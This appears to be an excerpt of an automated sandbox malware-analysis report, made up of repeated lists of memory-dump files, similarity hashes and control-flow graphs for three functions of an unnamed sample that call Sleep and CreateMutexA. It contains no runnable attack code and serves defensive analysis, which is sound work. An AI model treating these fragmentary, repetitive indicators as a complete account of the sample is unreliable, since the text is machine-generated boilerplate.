                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 4614ac339283491712165196619cdcebde8779b9f630aa36141775ce75d62c86
                                                                                                                                              • Instruction ID: a8067c19a12af9e309ced0e65139a79b78690363d10427b779a13078af170b99
                                                                                                                                              • Opcode Fuzzy Hash: 4614ac339283491712165196619cdcebde8779b9f630aa36141775ce75d62c86
                                                                                                                                              • Instruction Fuzzy Hash: 393168717101008BEB08DB78ED8976DB7A2DBC1315F286B28E814B73D5C73559888713
                                                                                                                                              Function 00E5A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 182 e5a1ae-e5a1ce 186 e5a1d0-e5a1dc 182->186 187 e5a1fc-e5a218 182->187 188 e5a1f2-e5a1f9 call e6d663 186->188 189 e5a1de-e5a1ec 186->189 190 e5a246-e5a265 187->190 191 e5a21a-e5a226 187->191 188->187 189->188 194 e5a935 189->194 192 e5a267-e5a273 190->192 193 e5a293-e5a916 call e680c0 190->193 196 e5a23c-e5a243 call e6d663 191->196 197 e5a228-e5a236 191->197 199 e5a275-e5a283 192->199 200 e5a289-e5a290 call e6d663 192->200 203 e5a953-e5a994 Sleep CreateMutexA 194->203 204 e5a935 call e86c6a 194->204 196->190 197->194 197->196 199->194 199->200 200->193 212 e5a9a7-e5a9a8 203->212 213 e5a996-e5a998 203->213 204->203 213->212 214 e5a99a-e5a9a5 213->214 214->212
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 4fb361f1cd55174e3823ad01a7c0848d290abb8be3e907288eab317684ac6595
                                                                                                                                              • Instruction ID: e069ab6a8075e62da7ebc300ae0d36ff3897eb32373c1916868b3796c4f247b6
                                                                                                                                              • Opcode Fuzzy Hash: 4fb361f1cd55174e3823ad01a7c0848d290abb8be3e907288eab317684ac6595
                                                                                                                                              • Instruction Fuzzy Hash: 3D315771A001008FEB08DB78ED8A75DB762EBC6315F286B28E804B73D4C73559888312
                                                                                                                                              Function 00E5A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 216 e5a418-e5a438 220 e5a466-e5a482 216->220 221 e5a43a-e5a446 216->221 224 e5a484-e5a490 220->224 225 e5a4b0-e5a4cf 220->225 222 e5a45c-e5a463 call e6d663 221->222 223 e5a448-e5a456 221->223 222->220 223->222 228 e5a93f-e5a949 call e86c6a * 2 223->228 230 e5a4a6-e5a4ad call e6d663 224->230 231 e5a492-e5a4a0 224->231 226 e5a4d1-e5a4dd 225->226 227 e5a4fd-e5a916 call e680c0 225->227 233 e5a4f3-e5a4fa call e6d663 226->233 234 e5a4df-e5a4ed 226->234 247 e5a94e 228->247 248 e5a949 call e86c6a 228->248 230->225 231->228 231->230 233->227 234->228 234->233 249 e5a953-e5a994 Sleep CreateMutexA 247->249 250 e5a94e call e86c6a 247->250 248->247 252 e5a9a7-e5a9a8 249->252 253 e5a996-e5a998 249->253 250->249 253->252 254 e5a99a-e5a9a5 253->254 254->252
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: d72e7d4669c932116e36e8df4a5c6fe63597112f611774023df309ff4e7f3d6b
                                                                                                                                              • Instruction ID: 79a3e5cf10d7892a7a8ca6a6bf5403e7065ce29058dc303ba816e26aefefe73d
                                                                                                                                              • Opcode Fuzzy Hash: d72e7d4669c932116e36e8df4a5c6fe63597112f611774023df309ff4e7f3d6b
                                                                                                                                              • Instruction Fuzzy Hash: AD313C716041009BEB089BB8EC8976DF7A2DFC1315F286B28E414B73D5D77559848752
                                                                                                                                              Function 00E5A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 256 e5a54d-e5a56d 260 e5a56f-e5a57b 256->260 261 e5a59b-e5a5b7 256->261 262 e5a591-e5a598 call e6d663 260->262 263 e5a57d-e5a58b 260->263 264 e5a5e5-e5a604 261->264 265 e5a5b9-e5a5c5 261->265 262->261 263->262 268 e5a944-e5a949 call e86c6a 263->268 266 e5a606-e5a612 264->266 267 e5a632-e5a916 call e680c0 264->267 270 e5a5c7-e5a5d5 265->270 271 e5a5db-e5a5e2 call e6d663 265->271 272 e5a614-e5a622 266->272 273 e5a628-e5a62f call e6d663 266->273 284 e5a94e 268->284 285 e5a949 call e86c6a 268->285 270->268 270->271 271->264 272->268 272->273 273->267 286 e5a953-e5a994 Sleep CreateMutexA 284->286 287 e5a94e call e86c6a 284->287 285->284 290 e5a9a7-e5a9a8 286->290 291 e5a996-e5a998 286->291 287->286 291->290 292 e5a99a-e5a9a5 291->292 292->290
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
